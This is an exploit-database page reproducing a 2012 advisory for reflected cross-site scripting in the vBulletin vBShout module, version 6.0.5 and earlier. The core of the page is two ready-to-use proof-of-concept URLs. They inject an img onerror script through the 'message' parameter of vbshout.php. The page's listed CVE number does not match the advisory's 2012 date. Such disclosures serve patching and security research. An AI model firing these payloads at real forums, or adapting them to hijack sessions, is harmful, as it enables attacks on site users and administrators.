Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-17496 | CWE-79 | $500 | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2012-03-26 |
CVSS | EPSS | EPSSP |
---|---|---|
Not available | 0.02192 | 0.50148 |
# Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) - Reflected Cross-Site Scripting ( XSS ) # Note: HTML Injection and Redirect works too # Script Page : http://www.dragonbyte-tech.com # Date: 24-03-2012 # Author : Avram Marius Gabriel (d3v1l) # RandomStorm - http://www.randomstorm.com # Tested on: Windows XP & Vista ############################################################################################################### # The last version of vBulletin vBShout Module suffers from Cross-Site Scripting and HTML Injection The issue is located in Shoutbox Search Archive # POC: # http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year] =0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1 # http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1 ################################################################################################################ # vBShout is the ideal way to keep members on your forum while they wait for replies to their posts. It can be used in many ways - as a chat room for members, for staff to discuss issues in realtime, as a live-update feed of new posts and threads, as a way to track member milestones ################################################################################################################ -- Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on Twitter<http://twitter.com/securityshell>
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.